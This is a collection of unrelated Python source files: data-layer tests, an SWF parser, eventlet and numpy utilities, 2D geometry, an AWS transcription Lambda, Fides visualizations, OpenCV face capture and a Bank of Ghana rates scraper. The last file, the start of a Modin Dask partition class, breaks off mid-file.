socio_2 = datos.alta(Socio(dni=12345679, nombre='Carlos', apellido='Perez'))
assert datos.buscar(socio_2.id) == socio_2
# buscar dni
socio_2 = datos.alta(Socio(dni=12345679, nombre='Carlos', apellido='Perez'))
assert datos.buscar(socio_2.dni) == socio_2
# modificacion
socio_3 = datos.alta(Socio(dni=12345680, nombre='Susana', apellido='Gimenez'))
socio_3.nombre = 'Moria'
socio_3.apellido = 'Casan'
socio_3.dni = 13264587
datos.modificacion(socio_3)
socio_3_modificado = datos.buscar(socio_3.id)
assert socio_3_modificado.id == socio_3.id
assert socio_3_modificado.nombre == 'Moria'
assert socio_3_modificado.apellido == 'Casan'
assert socio_3_modificado.dni == 13264587
# todos
assert len(datos.todos()) == 2
# borrar todos
datos.borrar_todos()
assert len(datos.todos()) == 0
if __name__ == '__main__':
pruebas()
|
def assign_fallback(config, default): return config if config is not None else default
def assign_raise(config):
if config is None or config == "":
raise ValueError()
else:
return config
|
"""A simple parser for SWF files."""
def byte_align(pos):
"""Return the smallest multiple of 8 greater than ``pos``. Raises
``ValueError`` if ``pos`` is negative.
"""
if pos < 0:
msg = "Expected positive integer, got {}"
raise ValueError(msg.format(pos))
return ((pos + 7) // 8) * 8
def get_bit(data, pos):
byte_index, bit_index = divmod(pos, 8)
byte = data[byte_index]
return (byte >> (7 - bit_index)) & 1, pos + 1
def _check_byte_alignment(pos):
if pos % 8 != 0:
msg = "Position not byte aligned: {}"
raise ValueError(msg.format(pos))
def get_byte(data, pos):
_check_byte_alignment(pos)
return data[pos // 8], pos + 8
def parse_bytes(data, pos, num_bytes):
_check_byte_alignment(pos)
return data[pos // 8 : (pos // 8) + num_bytes], pos + 8 * num_bytes
def as_signed(num, num_bits):
"""Interpret the bit pattern of the unsigned integer ``num`` as a
signed two's complement integer.
"""
if num & (1 << (num_bits - 1)) != 0: # if sign bit set
return num - (1 << num_bits)
else:
return num
def parse_ub(data, pos, num_bits):
result = 0
for _ in range(0, num_bits):
bit, pos = get_bit(data, pos)
result = (2 * result) + bit
return result, pos
def parse_sb(data, pos, num_bits):
ub, pos = parse_ub(data, pos, num_bits)
return as_signed(ub, num_bits), pos
def parse_fb(data, pos, num_bits):
sb, pos = parse_sb(data, pos, num_bits)
return sb / (2 ** 16), pos
def parse_uint(data, pos, num_bytes):
pos = byte_align(pos)
result = 0
for byte_index in range(0, num_bytes):
byte, pos = get_byte(data, pos)
result |= byte << (8 * byte_index)
return result, pos
def parse_ui8(data, pos):
return parse_uint(data, pos, 1)
def parse_ui16(data, pos):
return parse_uint(data, pos, 2)
def parse_ui32(data, pos):
return parse_uint(data, pos, 4)
def parse_ui64(data, pos):
return parse_uint(data, pos, 8)
def parse_si8(data, pos):
ui8, pos = parse_ui8(data, pos)
return as_signed(ui8, 8), pos
def parse_si16(data, pos):
ui16, pos = parse_ui16(data, pos)
return as_signed(ui16, 16), pos
def parse_si32(data, pos):
ui32, pos = parse_ui32(data, pos)
return as_signed(ui32, 32), pos
def parse_fixed8(data, pos):
si16, pos = parse_si16(data, pos)
return si16 / (2 ** 8), pos
def parse_fixed16(data, pos):
si32, pos = parse_si32(data, pos)
return si32 / (2 ** 16), pos
class Rect:
@staticmethod
def parse(data, pos):
rect = Rect()
num_bits, pos = parse_ub(data, pos, 5)
rect.x_min, pos = parse_sb(data, pos, num_bits)
rect.x_max, pos = parse_sb(data, pos, num_bits)
rect.y_min, pos = parse_sb(data, pos, num_bits)
rect.y_max, pos = parse_sb(data, pos, num_bits)
return rect, pos
def __repr__(self):
return "Rect({}, {}, {}, {})".format(
self.x_min,
self.x_max,
self.y_min,
self.y_max)
class Header:
def __init__(self, signature):
self.signature = signature
actual_ending = signature[1:]
expected_ending = 'WS'
if actual_ending != expected_ending:
msg = "Header signature is invalid; expected '{}', got '{}'"
raise ValueError(msg.format(expected_ending, actual_ending))
if signature[0] == 'F':
self.compression = None
elif signature[0] == 'C':
self.compression = 'zlib'
elif signature[0] == 'Z':
self.compression = 'lzma'
else:
msg = "Unknown compression type specified in header: '{}'"
raise ValueError(msg.format(header.signature[0]))
@staticmethod
def parse(data, pos):
sig_byte_1, pos = parse_ui8(data, pos)
sig_byte_2, pos = parse_ui8(data, pos)
sig_byte_3, pos = parse_ui8(data, pos)
header = Header(chr(sig_byte_1) + chr(sig_byte_2) + chr(sig_byte_3))
header.version, pos = parse_ui8(data, pos)
header.file_length, pos = parse_ui32(data, pos)
if header.compression is None:
header.frame_size, pos = Rect.parse(data, pos)
header.frame_rate, pos = parse_fixed8(data, pos)
header.frame_count, pos = parse_ui16(data, pos)
return header, pos
class Tag:
_types_by_num = {}
def __init_subclass__(cls, /, num, **kwargs):
super().__init_subclass__(**kwargs)
Tag._types_by_num[num] = cls
def __init__(self, type_num, length):
self.type_num = type_num
self.length = length
def _parse(self, data, pos):
self.data, pos = parse_bytes(data, pos, self.length)
@staticmethod
def parse(data, pos):
type_and_length, pos = parse_ui16(data, pos)
type_num = type_and_length >> 6
length = type_and_length & 0x3F
if length == 0x3F:
length, pos = parse_ui32(data, pos)
try:
tag_class = Tag._types_by_num[type_num]
tag = tag_class(type_num, length)
except KeyError:
tag = Tag(type_num, length)
tag._parse(data, pos)
return tag, pos + 8 * length
class End(Tag, num=0): pass
class ShowFrame(Tag, num=1): pass
class DefineShape(Tag, num=2): pass
class PlaceObject(Tag, num=4): pass
class RemoveObject(Tag, num=5): pass
class DefineBits(Tag, num=6): pass
class DefineButton(Tag, num=7): pass
class JPEGTables(Tag, num=8): pass
class SetBackgroundColor(Tag, num=9): pass
class DefineFont(Tag, num=10): pass
class DefineText(Tag, num=11): pass
class DoAction(Tag, num=12): pass
class DefineFontInfo(Tag, num=13): pass
class DefineSound(Tag, num=14):
_formats = {
0: 'uncompressed native-endian',
1: 'ADPCM',
2: 'MP3',
3: 'uncompressed little-endian',
4: 'Nellymoser 16 kHz',
5: 'Nellymoser 8 kHz',
6: 'Nellymoser',
11: 'Speex',
}
_sampling_rates = {
0: 5512.5,
1: 11025,
2: 22050,
3: 44100,
}
_bits_per_sample = {
0: 8,
1: 16,
}
_channels = {
0: 'mono',
1: 'stereo',
}
def _parse(self, data, pos):
original_pos = pos
self.id, pos = parse_ui16(data, pos)
format_num, pos = parse_ub(data, pos, 4)
self.format = DefineSound._formats[format_num]
sampling_rate_num, pos = parse_ub(data, pos, 2)
self.sampling_rate = DefineSound._sampling_rates[sampling_rate_num]
bits_per_sample_num, pos = parse_ub(data, pos, 1)
self.bits_per_sample = DefineSound._bits_per_sample[bits_per_sample_num]
channels_num, pos = parse_ub(data, pos, 1)
self.channels = DefineSound._channels[channels_num]
self.sample_count, pos = parse_ui32(data, pos)
data_length = self.length - ((pos - original_pos) // 8)
self.data, pos = parse_bytes(data, pos, data_length)
class StartSound(Tag, num=15): pass
class DefineButtonSound(Tag, num=17): pass
class SoundStreamHead(Tag, num=18): pass
class SoundStreamBlock(Tag, num=19): pass
class DefineBitsLossless(Tag, num=20): pass
class DefineBitsJPEG2(Tag, num=21): pass
class DefineShape2(Tag, num=22): pass
class DefineButtonCxform(Tag, num=23): pass
class Protect(Tag, num=24): pass
class PlaceObject2(Tag, num=26): pass
class RemoveObject2(Tag, num=28): pass
class DefineShape3(Tag, num=32): pass
class DefineText2(Tag, num=33): pass
class DefineButton2(Tag, num=34): pass
class DefineBitsJPEG3(Tag, num=35): pass
class DefineBitsLossless2(Tag, num=36): pass
class DefineEditText(Tag, num=37): pass
class DefineSprite(Tag, num=39): pass
class FrameLabel(Tag, num=43): pass
class SoundStreamHead2(Tag, num=45): pass
class DefineMorphShape(Tag, num=46): pass
class DefineFont2(Tag, num=48): pass
class ExportAssets(Tag, num=56): pass
class ImportAssets(Tag, num=57): pass
class EnableDebugger(Tag, num=58): pass
class DoInitAction(Tag, num=59): pass
class DefineVideoStream(Tag, num=60): pass
class VideoFrame(Tag, num=61): pass
class DefineFontInfo2(Tag, num=62): pass
class EnableDebugger2(Tag, num=64): pass
class ScriptLimits(Tag, num=65): pass
class SetTabIndex(Tag, num=66): pass
class FileAttributes(Tag, num=69): pass
class PlaceObject3(Tag, num=70): pass
class ImportAssets2(Tag, num=71): pass
class DefineFontAlignZones(Tag, num=73): pass
class CSMTextSettings(Tag, num=74): pass
class DefineFont3(Tag, num=75): pass
class SymbolClass(Tag, num=76): pass
class Metadata(Tag, num=77): pass
class DefineScalingGrid(Tag, num=78): pass
class DoABC(Tag, num=82): pass
class DefineShape4(Tag, num=83): pass
class DefineMorphShape2(Tag, num=84): pass
class DefineSceneAndFrameLabelData(Tag, num=86): pass
class DefineBinaryData(Tag, num=87): pass
class DefineFontName(Tag, num=88): pass
class StartSound2(Tag, num=89): pass
class DefineBitsJPEG4(Tag, num=90): pass
class DefineFont4(Tag, num=91): pass
class EnableTelemetry(Tag, num=93): pass
class SWFData:
def __init__(self, data):
pos = 0
self.header, pos = Header.parse(data, pos)
self.tags = []
if self.header.compression is None:
while pos // 8 < len(data):
tag, pos = Tag.parse(data, pos)
self.tags.append(tag)
|
from .mixins import PreviewMixin
|
from __future__ import print_function
from eventlet import event as _event
class metaphore(object):
"""This is sort of an inverse semaphore: a counter that starts at 0 and
waits only if nonzero. It's used to implement a "wait for all" scenario.
>>> from eventlet import coros, spawn_n
>>> count = coros.metaphore()
>>> count.wait()
>>> def decrementer(count, id):
... print("{0} decrementing".format(id))
... count.dec()
...
>>> _ = spawn_n(decrementer, count, 'A')
>>> _ = spawn_n(decrementer, count, 'B')
>>> count.inc(2)
>>> count.wait()
A decrementing
B decrementing
"""
def __init__(self):
self.counter = 0
self.event = _event.Event()
# send() right away, else we'd wait on the default 0 count!
self.event.send()
def inc(self, by=1):
"""Increment our counter. If this transitions the counter from zero to
nonzero, make any subsequent :meth:`wait` call wait.
"""
assert by > 0
self.counter += by
if self.counter == by:
# If we just incremented self.counter by 'by', and the new count
# equals 'by', then the old value of self.counter was 0.
# Transitioning from 0 to a nonzero value means wait() must
# actually wait.
self.event.reset()
def dec(self, by=1):
"""Decrement our counter. If this transitions the counter from nonzero
to zero, a current or subsequent wait() call need no longer wait.
"""
assert by > 0
self.counter -= by
if self.counter <= 0:
# Don't leave self.counter < 0, that will screw things up in
# future calls.
self.counter = 0
# Transitioning from nonzero to 0 means wait() need no longer wait.
self.event.send()
def wait(self):
"""Suspend the caller only if our count is nonzero. In that case,
resume the caller once the count decrements to zero again.
"""
self.event.wait()
|
#!/usr/bin/env python
#coding=utf-8
"""
counters.py: because we are using complex structures, we think
it is a good idea to have a file for the purpose.
"""
__author__ = "Francisco Maria Calisto"
__maintainer__ = "Francisco Maria Calisto"
__email__ = "francisco.calisto@tecnico.ulisboa.pt"
__license__ = "MIT"
__version__ = "1.0.0"
__status__ = "Development"
__copyright__ = "Copyright 2019, Instituto Superior Técnico (IST)"
__credits__ = [
"Bruno Oliveira",
"Carlos Santiago",
"Jacinto C. Nascimento",
"Pedro Miraldo",
"Nuno Nunes"
]
import os
import sys
from os import path
# The current folder path.
basePath = os.path.dirname(__file__)
# The path to the repository "src" folder.
joinRepoSrcPath = os.path.join(basePath, '..')
pathRepoSrcAbsPath = os.path.abspath(joinRepoSrcPath)
# Add the directory containing the module to
# the Python path (wants absolute paths).
sys.path.append(pathRepoSrcAbsPath)
# Appending countings path
consPath = os.path.join(joinRepoSrcPath, 'constants')
consAbsPath = os.path.abspath(consPath)
sys.path.append(consAbsPath)
sys.path.insert(0, consAbsPath)
# Importing available countings
from countings import *
import numpy as np
acc001 = np.array([[c_0_0, c_0_1, c_0_2, c_0_3, c_0_4, c_0_5],
[c_1_0, c_1_1, c_1_2, c_1_3, c_1_4, c_1_5],
[c_2_0, c_2_1, c_2_2, c_2_3, c_2_4, c_2_5],
[c_3_0, c_3_1, c_3_2, c_3_3, c_3_4, c_3_5],
[c_4_0, c_4_1, c_4_2, c_4_3, c_4_4, c_4_5],
[c_5_0, c_5_1, c_5_2, c_5_3, c_5_4, c_5_5]])
acc002 = np.array([[p_0_0, p_0_1, p_0_2, p_0_3, p_0_4, p_0_5],
[p_1_0, p_1_1, p_1_2, p_1_3, p_1_4, p_1_5],
[p_2_0, p_2_1, p_2_2, p_2_3, p_2_4, p_2_5],
[p_3_0, p_3_1, p_3_2, p_3_3, p_3_4, p_3_5],
[p_4_0, p_4_1, p_4_2, p_4_3, p_4_4, p_4_5],
[p_5_0, p_5_1, p_5_2, p_5_3, p_5_4, p_5_5]])
# ==================== END File ==================== # |
# -*- coding: utf-8 -*-
## @package inversetoon.geometry.line
#
# Implementation of a 2D line.
# @author tody
# @date 2015/08/12
import numpy as np
from inversetoon.np.norm import normalizeVector
from inversetoon.geometry.bounding_box import BoundingBox
## Implementation of a 2D line.
class Line:
## Constructor
#
# @param p start point
# @param q end point
#
# Line representation: (a, b, c) = (x1, y1, 1) $\times$ (x2, y2, 1)
# - points on line: (a, b, c) $\cdot$ (x, y , 1) = 0
# - line intersection: (x, y, w) = (a1, b1, c1) $\times$ (a2, b2, c2)
def __init__(self, p, q):
self._p = np.array(p)
self._q = np.array(q)
peq = np.array([p[0], p[1], 1])
qeq = np.array([q[0], q[1], 1])
self._n = np.cross(peq, qeq)
self._n = normalizeVector(self._n)
self._e = self._q - self._p
self._e = normalizeVector(self._e)
self._bb = BoundingBox([p, q])
## Return the positions of the line.
def points(self):
return np.array([self._p, self._q])
## Return the position of the parameter [0, 1].
def pointAt(self, t):
return self._p + t * self.length() * self._e
## Return the length of the line.
def length(self):
return np.linalg.norm(self._q - self._p)
## Find an intersected point with the given line.
def intersect(self, l):
ipeq = np.cross(self._n, l._n)
if np.abs(ipeq[2]) < 0.000:
return None
ipeq *= 1.0 / ipeq[2]
ip = np.array([ipeq[0], ipeq[1]])
if self._bb.contains(ip) and l._bb.contains(ip):
return ip
return None
## Returns the closest point on this line to the given point.
def closestPoint(self, p):
return self._closestPointVec(p)
## Returns the closest point on this line to the given point.
def _closestPointEq(self, p):
a, b, c = self._n
x0, y0 = p
x = (b * (b * x0 - a * y0) - a * c) / (a * a + b * b)
y = (a * (-b * x0 + a * y0) - b * c) / (a * a + b * b)
return np.array([x, y])
## Returns the closest point on this line to the given point.
def _closestPointVec(self, p):
v = p - self._p
return np.dot(v, self._e) * self._e + self._p
## Return the parameter of the closest point.
def closestParam(self, p):
v = p - self._p
t = np.dot(v, self._e)
return t / self.length()
## Return the distance from the given point to closest point on the line.
def distanceToPoint(self, p):
a, b, c = self._n
x0, y0 = p
return np.abs((a * x0 + b * y0 + c) / np.sqrt(a ** 2 + b ** 2))
## Plot line with matplot.
def plotLine(self, plt):
ps = self.points()
plt.plot(ps[:, 0], ps[:, 1], "-")
def plotVector(self, plt):
hl = 0.02
v = self._q - self._p
v *= 1.0 - 2.0 * hl
plt.arrow(self._p[0], self._p[1], v[0], v[1], head_width=0.5 * hl, head_length=hl)
## Plot closest point.
def plotClosetPoint(self, plt, p):
p = np.array(p)
cp = self.closestPoint(p)
plt.plot(cp[0], cp[1], "o")
plt.annotate('closest point: %s' % cp, xy=cp)
Line(p, cp).plotLine(plt)
Line(self._p, p).plotVector(plt)
if __name__ == '__main__':
import matplotlib.pyplot as plt
from inversetoon.plot.window import showMaximize
l1 = Line((0.0, 0.2), (1.0, 1.0))
l2 = Line((0.0, 1.0), (1.0, 0.0))
p = np.array((0.2, 0.6))
ax = plt.subplot(111)
ax.set_aspect('1.0')
l1.plotLine(ax)
l2.plotLine(ax)
ip = l1.intersect(l2)
t = l1.closestParam(ip)
plt.title("Intersect at t, p: %s, %s" % (t, ip))
ax.plot(ip[0], ip[1], "o")
ax.plot(p[0], p[1], "o")
l1.plotClosetPoint(plt, p)
ax.set_aspect('1.0')
showMaximize()
|
# This function is triggered by an S3 event when an object is created. It
# starts a transcription job with the media file, and sends an email notifying
# the user that the job has started.
import boto3
import uuid
import os
import re
import urllib.parse
s3 = boto3.client('s3')
ses = boto3.client('ses')
transcribe = boto3.client('transcribe')
s3_host = f"s3-{os.environ['AWS_REGION']}.amazonaws.com"
def get_media_format(path):
if re.search('.wav$', path) is not None:
return 'wav'
elif re.search('.flac$', path) is not None:
return 'flac'
elif re.search('.amr$', path) is not None:
return 'amr'
elif re.search('.3ga$', path) is not None:
return 'amr'
elif re.search('.mp3$', path) is not None:
return 'mp3'
elif re.search('.mp4$', path) is not None:
return 'mp4'
elif re.search('.m4a$', path) is not None:
return 'mp4'
elif re.search('.oga$', path) is not None:
return 'ogg'
elif re.search('.ogg$', path) is not None:
return 'ogg'
elif re.search('.opus$', path) is not None:
return 'ogg'
elif re.search('.webm$', path) is not None:
return 'webm'
else:
return 'mp3'
def get_s3_metadata(bucket, key):
return s3.head_object(Bucket=bucket, Key=key)['Metadata']
def lambda_handler(event, context):
# Generate a unique name for the job
transcription_job_name = uuid.uuid4()
bucket_name = event['Records'][0]['s3']['bucket']['name']
_object_key = event['Records'][0]['s3']['object']['key']
object_key = urllib.parse.unquote_plus(_object_key)
print(f"Starting transcription job: {transcription_job_name}")
print(f"Object: {bucket_name}/{object_key}")
media_metadata = get_s3_metadata(bucket_name, object_key)
notification_email = media_metadata['email']
channel_identification = media_metadata['channelidentification']
language_code = media_metadata['languagecode']
max_speaker_labels = int(media_metadata['maxspeakerlabels'])
transcription_job_settings = {
'ChannelIdentification': channel_identification == 'On',
'ShowSpeakerLabels': channel_identification != 'On'
}
job_params = {
'TranscriptionJobName': f"{transcription_job_name}",
'MediaFormat': get_media_format(object_key),
'Media': {
'MediaFileUri': f"https://{s3_host}/{bucket_name}/{object_key}"
},
'Settings': transcription_job_settings,
'OutputBucketName': os.environ['TRANSCRIPTIONS_OUTPUT_BUCKET'],
'Tags': [
{
'Key': 'Project',
'Value': 'serverless-transcribe'
}
]
}
if language_code == 'IdentifyLanguage':
job_params['IdentifyLanguage'] = True
else:
job_params['LanguageCode'] = language_code
if channel_identification != 'On':
transcription_job_settings['MaxSpeakerLabels'] = max_speaker_labels
if os.environ['JOB_TAG_KEY'] and os.environ['JOB_TAG_VALUE']:
job_params['Tags'].append({
'Key': os.environ['JOB_TAG_KEY'],
'Value': os.environ['JOB_TAG_VALUE']
})
print(f"Job parameters: {job_params}")
transcribe.start_transcription_job(**job_params)
ses.send_email(
Source=os.environ['NOTIFICATION_SOURCE_EMAIL_ADDRESS'],
Destination={
'ToAddresses': [
notification_email
]
},
Message={
'Subject': {
'Data': f"Transcription has started for {object_key}",
'Charset': 'UTF-8'
},
'Body': {
'Text': {
'Data': 'An email will be sent when it completes.',
'Charset': 'UTF-8'
}
}
}
)
|
import sys
from PyQt5 import QtWidgets
from src.config import Window
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
window = Window()
sys.exit(app.exec_()) |
"""
Creates data visualizations for hierarchical Fides resource types.
"""
from typing import Generator, List, Dict
import plotly
import plotly.graph_objects as go
from fidesctl.core import config
FIDES_KEY_NAME = "fides_key"
FIDES_PARENT_NAME = "parent_key"
def hierarchy_figures(
categories: List[dict],
resource_type: str,
json_out: bool = False,
condensed_html: bool = False,
) -> str:
"""
Generate html to display a hierarchy with several representation options
Args:
categories: list of the dictionaries for each taxonomy member
resource_type: the name of the resource type
json_out: Flag to return a json representation of the visualization
condensed_html: Flag to condense the result html but not including js and instead pointing to cdn
Returns:
Json representation of the figure if `json_out` is True, html otherwise
"""
source = []
target = []
labels = []
parents = []
fides_key_dict = {}
# build assets/relationships for figures
for i, category in enumerate(categories):
# get sunburst labels and parents
labels.append(category[FIDES_KEY_NAME])
parents.append(category[FIDES_PARENT_NAME])
# build sankey mapping
fides_key_dict[category[FIDES_KEY_NAME]] = i
# assign colors for grouping in sunburst chart
category["color"] = category[FIDES_KEY_NAME].split(".")[0]
# get source and target paths for sankey and icicle graphs
if FIDES_PARENT_NAME in category and category[FIDES_PARENT_NAME]:
source.append(fides_key_dict[category[FIDES_PARENT_NAME]])
target.append(fides_key_dict[category[FIDES_KEY_NAME]])
fig_data = [
go.Sunburst(labels=labels, parents=parents, hoverinfo="skip"),
go.Sankey(
valueformat=".1f",
valuesuffix="%",
node=dict(
pad=15,
thickness=20,
line=dict(color="black", width=0.5),
label=list(fides_key_dict.keys()),
color="blue", # Maybe make this 'ethyca blue'?
# hovertemplate="%{label}",
),
link=dict(source=source, target=target, value=target),
visible=False,
hoverinfo="skip",
),
go.Icicle(labels=labels, parents=parents, visible=False, hoverinfo="skip"),
]
fig = dict(
data=fig_data,
layout=dict(
title=f'Fides {resource_type.replace("_", " ").title()} Hierarchy',
showlegend=False,
updatemenus=list(
[
dict(
active=0,
buttons=list(
[
dict(
label="Sunburst",
method="update",
args=[{"visible": [True, False, False]}],
),
dict(
label="Sankey",
method="update",
args=[{"visible": [False, True, False]}],
),
dict(
label="Icicle",
method="update",
args=[{"visible": [False, False, True]}],
),
]
),
)
]
),
),
)
if json_out:
return plotly.io.to_json(fig)
return plotly.io.to_html(
fig, include_plotlyjs="cdn" if condensed_html else True, full_html=True
)
def create_hierarchical_dict(data: dict, keys: List) -> None:
"""
Create a nested dictionary given a list of strings as a key path
Args:
data: Dictionary to contain the nested dictionary as it's built
keys: List of keys that equates to the 'path' down the nested dictionary
Returns:
None
"""
for key in keys:
if key in data:
if key == keys[-1]:
# we've reached the end of the path (no more children)
data[key] = {}
data = data[key]
else:
data[key] = {}
def convert_categories_to_nested_dict(categories: List[dict]) -> dict:
"""
Convert a catalog yaml file into a hierarchical nested dictionary.
Leaf nodes will have an empty dictionary as the value.
e.g.:
{Parent1:
{
Child1: {},
Child2: {},
Parent2: {
Child3: {}
}
}
}
Args:
categories : list of dictionaries containing each entry from a catalog yaml file
"""
nested_output: Dict[Dict, Dict] = {}
for category in categories:
if FIDES_PARENT_NAME not in category:
nested_output[category[FIDES_KEY_NAME]] = {}
else:
node_path = category[FIDES_KEY_NAME].split(".")
create_hierarchical_dict(nested_output, node_path)
return nested_output
def nest_to_html(nested_dict: dict, indent_factor: int) -> Generator:
"""
Create the html
Args:
nested_dict: nested dictionary for keys to convert to html list object
indent_factor: spacing multiplier
Returns:
HTML string containing a nested, unordered list of the nested dictionary keys
"""
spacing = " " * indent_factor
for key, value in nested_dict.items():
yield "{}<li>{}</li>".format(spacing, key)
if isinstance(value, dict):
yield "{spacing}<ul>\n{member}\n{spacing}</ul>".format(
spacing=spacing,
member="\n".join(nest_to_html(value, indent_factor + 1)),
)
def nested_categories_to_html_list(
categories: List[dict], resource_type: str, indent: int = 1
) -> str:
"""
Create an HTML string unordered list from the keys of a nested dictionary
Args:
categories: list of the dictionaries for each taxonomy member
resource_type: the name of the resource type
indent: spacing multiplier
"""
nested_categories = convert_categories_to_nested_dict(categories)
header = f'<h2>Fides {resource_type.replace("_", " ").title()} Hierarchy</h2>'
categories_tree = "\n".join(nest_to_html(nested_categories, indent))
return f"{header}\n{categories_tree}"
def get_visualize_url(resource_type: str, visualize_type: str) -> str:
"""
Get the url to the resource visualization web page
Args:
resource_type: Type of data fides resource ["data_category", "data_qualifier", "data_use"]
visualize_type: type of UI to get a link to ["sankey", "sunburst", "text"]
Returns:
url string to the visualization
"""
settings = config.get_config()
visualize_url = "{}/{}/visualize/{}".format(
settings.cli.server_url, resource_type, visualize_type
)
return visualize_url
|
import cv2
import numpy as np
classificador = cv2.CascadeClassifier("haarcascade-frontalface-default.xml")
classificadorOlhos = cv2.CascadeClassifier("haarcascade-eye.xml")
camera = cv2.VideoCapture(0)
amostra = 1
numeroAmostra = 25
id = input('Digite o seu identificador: ')
largura, altura = 220, 220
print("Capturando as faces.....")
while (True):
conectado, imagem = camera.read()
if (conectado is True):
imagemcinza = cv2.cvtColor(imagem, cv2.COLOR_BGR2GRAY)
# print(np.average(imagemcinza))
facesDetectadas = classificador.detectMultiScale(imagemcinza, scaleFactor= 1.5,minSize=(100,100))
for (x, y, l, a) in facesDetectadas:
cv2.rectangle(imagem, (x, y), (x + l, y + a), (0, 0, 255), 2)
regiao = imagem[y:y + a, x:x + l]
regiaoCinzaOlho = cv2.cvtColor(regiao, cv2.COLOR_BGR2GRAY)
olhosDetectados = classificadorOlhos.detectMultiScale(regiaoCinzaOlho)
for (ox, oy, ol, oa) in olhosDetectados:
cv2.rectangle(regiao, (ox, oy), (ox + ol, oy + oa), (0, 255, 0), 2)
if cv2.waitKey(1) & 0xFF == ord('q'):
if np.average(imagemcinza) > 110:
imagemFace = cv2.resize(imagemcinza[y:y + a, x:x + l], (largura, altura))
cv2.imwrite("fotos/pessoa." + str(id) + "." + str(amostra) + ".jpg", imagemFace)
print("[foto " + str(amostra) + " capturada com sucesso")
amostra +=1
cv2.imshow("Face", imagem)
# cv2.waitKey(1)
if (amostra >= numeroAmostra + 1):
break
print("Faces capturadas com sucesso")
camera.release()
cv2.destroyAllWindows()
|
# python scraperv2.py https://www.bog.gov.gh/treasury-and-the-markets/treasury-bill-rates/
# python scraperv2.py https://www.bog.gov.gh/treasury-and-the-markets/historical-interbank-fx-rates/
import requests
from bs4 import BeautifulSoup as bs
import urllib3
from _datetime import datetime
import csv
import sys
from time import sleep
import argparse
import os
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
BASE_URL = 'https://www.bog.gov.gh/wp-admin/admin-ajax.php?action=get_wdtable&table_id'
def mkdir(path):
"""
Create directory
"""
if not os.path.exists(path):
os.makedirs(path)
else:
print(f' * Directory %s already exists = {path}')
# def argparser():
# '''
# argparser defnition
# '''
# parser = argparse.ArgumentParser(description='Bank of Ghana FX Rates')
# parser.add_argument('--url',
# default='https://www.bog.gov.gh/treasury-and-the-markets/historical-interbank-fx-rates/',
# type=str,
# help='URL to page to scrap')
#
# #parser.add_argument('--dataFolder', default='', type=str, help='Where to output historical data')
#
# args = parser.parse_args()
# return args
#
# args = argparser()
def scrape_table(url=''):
'''scrape table definition'''
if url == '':
url = 'https://www.bog.gov.gh/treasury-and-the-markets/historical-interbank-fx-rates/'
table = get_table_info(url)
if table is None:
return
draw = 1
start = 0
length = 10000
lines = []
while True:
try:
response = send_request(table['wdtNonce'], table['id'], draw, start, length)
if len(response['data']) > 0:
for line in response['data']:
lines.append(line)
start += length
else:
break
except:
print('Unsuccessful request. Trying again in few seconds.')
sleep(5)
try:
lines.sort(key=lambda x: datetime.strptime(x[0], '%d %b %Y'), reverse=True)
except:
pass
return {'name': table['name'], 'data': lines, 'headers': table['headers']}
def get_table_info(url):
'''Get table information'''
print('Loading table id...')
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)"
" Chrome/85.0.4183.121 Safari/537.36"
}
html = requests.get(url, headers=headers, verify=False).text
soup = bs(html, 'lxml')
table = soup.find('table', id='table_1')
input_wdt = soup.find('input', id='wdtNonceFrontendEdit')
if table is None or input_wdt is None:
print('Non-generic table url. Please contact developer.')
return None
if url[-1] in '/':
name = url.split('/')[-2]
else:
name = url.split('/')[-1]
table_id = table['data-wpdatatable_id']
headers = []
for header in table.find('thead').find('tr').find_all('th'):
headers.append(header.get_text().strip())
wdt_nonce = input_wdt['value']
table_info = {'name': name, 'id': table_id, 'wdtNonce': wdt_nonce, 'headers': headers}
print(f'Table id is {table_id}')
return table_info
def send_request(wdt, table_id, draw, start, length):
'''send request to scrape page'''
print('Scraping data from API...')
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)"
" Chrome/85.0.4183.121 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Accept": "application/json, text/javascript, */*; q=0.01",
}
data = {
"draw": draw,
"wdtNonce": wdt,
"start": start,
"length": length
}
response = requests.post(f'{BASE_URL}={table_id}',headers=headers, data=data, verify=False)
return response.json()
def save_csv(name, headers, lines):
'''save scraped data to csv'''
print('Saving results in csv...')
with open(f"{name}.csv", "w", newline='', encoding="utf-8") as csvfile:
writer = csv.writer(csvfile, quoting=csv.QUOTE_MINIMAL)
writer.writerow(headers)
for line in lines:
writer.writerow(line)
print(f'{name}.csv saved! Total records: {len(lines)}')
class RatesURL(object):
def __init__(self, url=''):
self.url = url
def getUrl(self):
return self.url
def setUrl(self, url):
self.url = url
def run(url):
#if len(sys.argv) > 1 and 'https://' in sys.argv[1]:
#url = sys.argv[1].strip()
#url = args.url
#url = RatesURL(url)
if 'https://' in url.getUrl():
table = scrape_table(str(url.getUrl()))
else:
table = scrape_table()
if table is not None:
save_csv(table['name'], table['headers'], table['data'])
if __name__ == '__main__':
url = RatesURL()
url.setUrl('https://www.bog.gov.gh/treasury-and-the-markets/treasury-bill-rates/')
run(url)
|
# Licensed to Modin Development Team under one or more contributor license agreements.
# See the NOTICE file distributed with this work for additional information regarding
# copyright ownership. The Modin Development Team licenses this file to you under the
# Apache License, Version 2.0 (the "License"); you may not use this file except in
# compliance with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
import pandas
from modin.engines.base.frame.partition import BaseFramePartition
from modin.data_management.utils import length_fn_pandas, width_fn_pandas
class DaskFramePartition(BaseFramePartition):
def __init__(self, dask_obj, func=None):
import dask
self.dask_obj = dask_obj
self.delayed_call = (
dask_obj if func is None else dask.delayed(func[0])(dask_obj, **func[1])
)
def get(self):
"""Return the object wrapped by this one to the original format.
Note: This is the opposite of the classmethod `put`.
E.g. if you assign `x = BaseFramePartition.put(1)`, `x.get()` should
always return 1.
Returns:
The object that was `put`.
"""
self.delayed_call = self.dask_obj
return self.delayed_call.compute()
def apply(self, func, **kwargs):
"""Apply some callable function to the data in this partition.
